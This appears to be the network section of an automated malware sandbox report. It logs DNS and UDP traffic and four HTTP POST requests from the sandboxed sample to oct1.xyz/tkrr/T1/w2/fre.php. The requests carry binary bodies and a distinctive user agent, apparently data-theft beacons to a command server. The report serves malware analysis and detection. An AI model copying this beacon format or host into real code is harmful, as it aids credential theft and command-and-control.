Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
oct1.xyz | 104.21.3.187 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
POST
404
http://oct1.xyz/tkrr/T1/w2/fre.php
REQUEST
RESPONSE
BODY
POST /tkrr/T1/w2/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: oct1.xyz
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E74F1EDC
Content-Length: 186
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 26 May 2021 00:40:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
cf-request-id: 0a47b6bde1000042d2959c6000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=rju8UvSRCIbdufG1dkEhjr8AGghOxO%2B675cY5CyT%2BeWQ2TTh%2FXxGimefcFcR8MUEShx9fYQMbJtkFW7%2FioGloTRwjuLkFdMtqT%2Bp99jXzD8rXxLiCEo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6552f3dc9c0a42d2-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST
404
http://oct1.xyz/tkrr/T1/w2/fre.php
REQUEST
RESPONSE
BODY
POST /tkrr/T1/w2/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: oct1.xyz
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E74F1EDC
Content-Length: 186
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 26 May 2021 00:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
cf-request-id: 0a47b6bff60000e7e9860b9000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=rAXigXy%2FptNBiSty1NxnDQx9ExTzDUr1s%2FS7dJa%2FmX4ai1s8P3dQadpWSIlWn0C9k04Xlt%2FwCVEWrPyWeNX%2FFplB9CQkZrG89JPxJcUwoyWGwB0CP5E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6552f3dffdf3e7e9-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST
404
http://oct1.xyz/tkrr/T1/w2/fre.php
REQUEST
RESPONSE
BODY
POST /tkrr/T1/w2/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: oct1.xyz
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E74F1EDC
Content-Length: 159
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 26 May 2021 00:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
cf-request-id: 0a47b6c20c0000eafc12821000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=wtQuajcbGXy4b2LvlxQc9d23%2FUQ8jtA0QlO4SgyJIv1Y1bGlQNAVpV4lrayyjurFUXMemSNAFpsGXr%2B8InlDONfZ8PvFuePCECyxHqlNkk1wTGCSy6s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6552f3e34c93eafc-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST
404
http://oct1.xyz/tkrr/T1/w2/fre.php
REQUEST
RESPONSE
BODY
POST /tkrr/T1/w2/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: oct1.xyz
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E74F1EDC
Content-Length: 159
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 26 May 2021 00:41:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
cf-request-id: 0a47b7ae3b000004fb96265000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XIli%2FfOmdqKUmc61weNHASIYDBaf7NnERWhdy3i4Esqc5QttMjnpxIEJAqKfMZ6zaUs149gdAHukN5y0wNwtY6SFftOx3wc4Vdpl%2FTnQ2MLOV0lPpfU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6552f55d2eef04fb-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts